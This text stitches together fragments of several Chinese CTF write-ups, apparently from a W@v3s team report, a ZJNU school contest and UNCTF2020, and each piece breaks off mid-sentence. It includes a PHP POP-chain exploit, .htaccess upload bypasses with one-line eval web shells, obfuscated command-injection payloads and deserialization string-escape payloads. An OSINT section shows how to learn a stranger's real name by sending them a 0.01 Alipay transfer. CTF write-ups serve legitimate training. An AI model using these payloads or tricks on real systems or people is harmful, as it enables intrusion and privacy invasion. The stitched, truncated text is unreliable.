W@v3s战队一、战队信息名称:W@v3s排名:9二、解题情况粘贴解题图片三、解题过程Web题目一名称 Checkin直接访问 Burp抓包即可得到flag关键步骤截图题目二名称 pppopPop链的exp:<?php class A1{ public $tmp1; public $tmp2; } class A3{ } class A4{ public $tmp1; } class A6{ public $tmp1; } class A8{ } $a1 = new A1(); $a3 = new A3(); $a4 = new A4(); $a6 = new A6(); $a8 = new A8(); $a1->tmp1=$a3; $a3->tmp2=$a4; $a4->tmp1=$a6; $a6->tmp1=$a8; echo urlencode(serialize($a1));这时候会执行echo new $this->tmp1($this->tmp2);使用GlobIterator匹配通配符读文件f
第一次参加的校赛 :Coolapk46: 要被锤爆了好多大佬噢,还有个没进集训队的巨佬直接冲到第三,tql这里是官方题目和wphttps://github.com/A1natas/zjnuctf-school-contest-2021下面是菜鸡wp请慢用热身网络安全法直接搜网络安全法颁布日期webweb签到Hackbar post system(“cat flag;”)即可easy upload上传.htaccess文件,内容为<FilesMatch "evil.png"> SetHandler application/x-httpd-php </FilesMatch> burp抓包改文件类型为image/jpeg然后上传 evil.png,内容为<?php eval($_POST[pass]);?>蚁剑连接,密码为pass,根目录找到flagmd5Payload:?a1=QNKCDZO&a2=s878926199a&b1[]=111&b2[]=222Post:cmd=system('ca\t<>/fl\ag');
MISCpng下载图片发现是一张可爱猫咪图片,直接放到010editor里面,发现图片尾部有一段base64M2I3OWJkZjhmY2ZkNTVmZH0=,拿去解码得到3b79bdf8fcfd55fd},后面好像没有什么东西了,然后尝试crc隐写。放入脚本解码得到原本的宽高为04 29修改后得到flag第一部分 不说人话进去一看只有.!?三个字符,直接想到是Ook密码变形,然后打开记事本替换后解码即可https://www.splitbrain.org/services/ook 【真签到题】快来看直播进入直播间后flag就在上面【The End】世界的终焉明明是问卷,名字还这么高级溯源!溯源!溯源!这题真是。。一言难尽多试了几次第一题可以通过这个whois查询到邮箱https://www.whois365.com/cn/第二题查姓名第一个字是通过支付宝转账0.01之后可以直接通过银行app查看被转账人姓名第三题姓名最后一个字直接进入支付宝转账界面看最后一个字第四题百度电话号码,可以查到一个表单,里面包含南京雨花九如啥啥啥的养老院负责人电话,看了一下发布时间还比较新,应该是新数据,判断
比赛:UNCTF2020校内赛ID:Satan9axuxuan AN_666 XunflashWeb1.easy_ssrf2.俄罗斯方块人大战奥特曼查看源代码,发现有一个压缩包下载下来发现有打开即可得到flag3.easy_upload解题过程:上传题,测试不能上传php,phtml等,发现数据库是apache,尝试上传.htaccess文件,文件内容plain AddType application/x-httpd-p\ hp .jpg 上传hp.jpg内容plain <?=eval($_POST[satan]); 连接蚁剑得到flag4.easyunserialize解题过程:反序列化字符串逃逸,构造payloadplain challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;; 得出flag5.ezphp解题过程:原题,构造payloadplain data=a:2:{s
Xunflash